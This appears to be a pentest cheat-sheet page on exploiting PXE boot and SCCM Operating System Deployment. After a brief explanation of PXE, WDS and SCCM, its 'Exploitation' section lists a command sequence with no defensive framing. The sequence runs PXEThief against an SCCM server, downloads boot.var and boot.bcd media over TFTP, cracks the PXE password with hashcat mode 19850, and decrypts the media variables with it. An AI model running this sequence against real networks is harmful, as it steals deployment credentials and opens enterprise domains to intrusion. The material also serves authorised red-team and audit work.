PXE/OSD Exploitation

What is it ?

PXE is a technology that enables a computer to boot over a network, rather than from a hard disk or CD-ROM. This technology is used to deploy operating systems on computers with no operating system installed, or to boot computers with a temporary operating system for maintenance or diagnostic tasks. In a Windows environment, PXE is often used in combination with WDS (Windows Deployment Services) or SCCM (System Center Configuration Manager) to deploy Windows images to many computers simultaneously.

OSD (Operating System Deployment) refers to the set of processes and technologies used to install and configure operating systems on computers within an enterprise. In the context of Windows, this generally includes the use of solutions such as SCCM, which enable customized Windows images to be created, deployed to target machines via the network, and post-deployment settings and applications to be managed. These technologies are essential for effectively managing the operating system lifecycle in large organizations, enabling deployment automation, configuration standardization, and the reduction of costs and errors associated with manually installing operating systems on numerous devices.

Exploitation

# PXE password is not present
python3 pxethief.py 1
# or
python3 pxethief.py 2 sccm2.root.local

# PXE password is present
pxethief.py 1 or pxethief.py 2 sccm2.root.local

tftp -i 192.168.1.9 GET "\SMSTemp\2023.07.14.21.38.36.0001.{85E1DEDB-5CB6-4BCC-826B-77D48AC0BE71}.boot.var"
"2023.07.14.21.38.36.0001.{85E1DEDB-5CB6-4BCC-826B-77D48AC0BE71}.boot.var"

tftp -i 192.168.1.9 GET "\SMSTemp\2023.07.14.21.38.35.04.{85E1DEDB-5CB6-4BCC-826B-77D48AC0BE71}.boot.bcd"
"2023.07.14.21.38.35.04.{85E1DEDB-5CB6-4BCC-826B-77D48AC0BE71}.boot.bcd"

pxethief.py 5 2023.07.14.21.38.36.0001.{85E1DEDB-5CB6-4BCC-826B-77D48AC0BE71}.boot.var

hashcat -m 19850 hash wordlist.txt --force

python3 pxethief.py 3 "2023.07.14.21.38.36.0001.{85E1DEDB-5CB6-4BCC-826B-77D48AC0BE71}.boot.var" Password123